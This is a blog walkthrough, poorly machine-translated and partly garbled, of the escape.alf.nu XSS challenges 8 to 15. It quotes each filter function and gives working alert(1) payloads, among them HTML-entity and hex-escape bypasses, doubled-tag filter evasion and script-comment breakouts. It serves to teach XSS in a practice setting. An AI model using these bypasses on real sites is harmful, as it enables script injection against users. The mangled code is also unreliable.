Escape.alf.nu XSS challenges 8-15 Advanced XSS

This article link: http://blog.csdn.net/u012763794/article/details/51526725

Last time I told challenge 0-7 http://blog.csdn.net/u012763794/article/details/51507593, I should be more detailed than others, In fact, this needs to have a certain degree of XSS practice (own environment to make a no filter on it), to be familiar with JS

Needless to say, directly on the challenge, note: to alert (1) to Customs clearance

Challenge 8

function Escape (s) {  //courtesy of Skandiabanken  return ' <script>console.log ("' + s.touppercase () + '") & Lt;/script> ';}

This is the conversion of our input to uppercase.
Let's try the HTML entity character, that is, & #后面加十进制ascii, when you can also hex, such as & #x61, add an X on the back of the line we only convert English alert------>& #97 & #108 & #101 & #114 & #116Because it is HTML entity characters, only in the HTML element to take effect, we put the IMG tag to see

In addition, the HTML is not sensitive to case, that is, the case is the same as the meaning of the letter

It's a little bit long to be close.

Payload:</script><script >

There are other payload and retrofits.

</script>

</script><svg onload=& #97 & #108 & #101 & #114 & #116 (1)//

Hex-

</script><svg onload=& #x61 & #x6C & #x65 & #x72 & #x74 (1)//

Of course, you can also put a JS file on your own server, the contents of the File: alert (1);

If you have a short domain name, the character length will be shorter, and the short link should not be short.

Challenge 9

function Escape (s) {//This was sort of a spoiler for the last level  :-)  if (/[\\<>]/.test (s)) return '-'; 
   return ' <script>console.log ("' + s.touppercase () + '") </script> ';}

Here after practice, once matched to \, <, and > will return directly '-' and uppercase, and cannot enter < Can you change it for alert?CTFShould very often see Jsfuck, encrypted website: http://www.jsfuck.com/
That's a lot of characters.
Before the freebuf see there is a also do not use the letter JS encryption conversion, remember to write it again
Challenge 10

function Escape (s) {function htmlescape (s) {return s.replace (/./g, function (x) {return {' < ': ' &lt; ', ' > ': ' &gt; ', ' & ': ' &amp; ', ' ' ': ' &quot; ', ' ' ': ' & #39; '} [X] | |            X  });            } function Expandtemplate (template, args) {return template.replace (/{(\w+)}/g, function (_, N) {         Return Htmlescape (Args[n]);  }); } return Expandtemplate ("\ First we look at the last return, calling the Expandtemplate function to handle a string of HTML elements, while expandtemplate inside calls the Htmlescape
The Expandtemplate function seems to be useless, know the great God trouble tell me

Htmlescape single and double quotes,& and <,> are converted to HTML entity characters, but no filter \ Escape character
, then we use hex to see

Payload:  \x3cimg src=123 onerror=alert (1)//\x3c is less than sign hex

You can see that JS converts a 16 binary to a character when processing a string.

Other payload,\x3e are greater than hex
\x3cimg src=123 Onerror=alert (1) \x3e
\x3csvg Onload=alert (1)/ /SVG This is HTML5 's canvas element.

Challenge 11
function Escape (s) {  //spoiler for Level 2  s = json.stringify (s). Replace (/<\/script/gi, ");  Return ' <script>console.log (' + S + ');</script> ';}
Stringify can be escaped ", the following replace is the replacement </script is a null character, G is the global mode, is to search from the beginning to the tail, no matter how many, I ignore the case
In SQL injection, replace with empty, and we'll just double-write it.
Payload: </sc</scriptript><script>alert (1)//Of course double write can casually engage </</scriptscript><script> Alert (1)//
</s</scriptcript><script>alert (1)//
............................ such as


Challenge 12
function Escape (s) {  //Pass Inn "Callback#userdata"  var thing = S.split (/#/);   if (!/^[a-za-z\[\] ']*$/.test (thing[0])) return ' Invalid callback ';  var obj = {' UserData ': thing[1]};  var json = json.stringify (obj). replace (/\//g, ' \\/');  Return "<script>" + thing[0] + "(" + JSON + ") </script>";}
var thing = S.split (/#/)
Separate two-part input with #
if (!/^[a-za-z\[\] ']*$/.test (thing[0])) return ' Invalid callback ';
#号 to the left can only enter uppercase and lowercase letters and left and right brackets
var json = json.stringify (obj). replace (/\//g, ' \\/');
Will be escaped, replacing replace/for \\/, is actually replaced by \/

The original HTML comments can also, it is simple

Single quotation mark closed in front, followed by comment
Payload: ' # '; alert (1);<!--


Challenge 13
function Escape (s) {  var tag = document.createelement (' iframe ');  For the-one, you get-to-run any code-want, but a "sandboxed" iframe.  //http://print.alf.nu/?html= just outputs whatever you pass in.  //Alerting from Print.alf.nu won ' t count, try to trigger the one below.  s = ' <script> ' + S + ' <\/script> ';  TAG.SRC = ' http://print.alf.nu/?html= ' + encodeuricomponent (s);  Window. WINNING = function () {Youwon = true;};  Tag.onload = function () {    if (youwon) alert (1);  };  Document.body.appendChild (tag);}
The encodeURIComponent () function is actually a URL code.
We look at the IFRAME, and when a Name property is set in the IFRAME, the value of the Name property becomes the global of the Window object in the IFRAME.
Like the ABC below.

A little more popular.

There is also a detail, that is, the URL, directly back to JS, set the name of the IFrame property

So payload:name= ' Youwon '


Challenge 14
function Escape (s) {function json (s) {return json.stringify (s)." Replace (/\//g, ' \ \ \ /‘); } function HTML (s) {return s.replace (/[<> "&]/g, function (s) {return ' + S.charc Odeat (0) + '; '; });     } return (' <script> ' + ' var url = ' + JSON (s) + ';//we\ ' ll use this later ' + ' </script>\n\n ' + ' <!--for debugging-->\n ' + ' URL: ' + HTML (s) + ' \ n ' + ' <!--then suddenly-->\n ' + ' <s cript>\n ' + ' if (!/^http:.*/.test (URL)) console.log ("Bad URL:" + URL); \ n ' + ' else new Image (). src = url;\n ' + ' </script> ');} 
First we look at the return function, return two script, the first <script> use the JSON (s) function to construct a URL, followed by the middle HTML () Output URL
The second script creates a new image of our URL if it is successfully bypassed
JSON functions filter double quotes and comment characters
The HTML function Filters <> "&
First look at what effect

Because it is more complicated, it is explained directly with the payload of others.
Alert (1);/*<!--<script>*/if (/a//*

Copy the right side to our local test

We can see that the last */* We entered commented out many of the following, removing the green code, and simplifying the code is
var url = "alert (1);\/*<!--<script>*\/if (\/a\/\/*  "; Url:alert (1); if (/a/.test (URL)) console.log ("Bad URL:" + URL); else new Image (). src = URL;
Just a little bit easier.

Just a little bit easier.


Challenge 15
function Escape (s) {  return s.split (' # '). Map (function (v) {      ///Only 20% of slashes is end tags; save 1.2% of Total      //bytes by only escaping those.      var json = json.stringify (v). Replace (/<\//g, ' <\\/');      Return ' <script>console.log (' +json+ ') </script> ';      }). Join (");}
payload:<!--<script>#)/;alert (1)//-->

Last generated code: <script>console.log ("<!--<script>") </script><script>console.log (")/;alert (1) --") </script> Copy to Local
Knock the middle of the center directly on the console.
Console.log ("<!--<script>") </script><script>console.log (")/;alert (1)//-->")

To simplify it, Console.log ("<!--<script>") </script><script>console.log (")/; Alert (1)
Console less than sign/regular expression/; Alert (1)
So it's syntactically correct.

It's actually two statements.

All right, welcome to my conversation.
This article link: http://blog.csdn.net/u012763794/article/details/51526725


Escape.alf.nu XSS challenges 8-15 Advanced XSS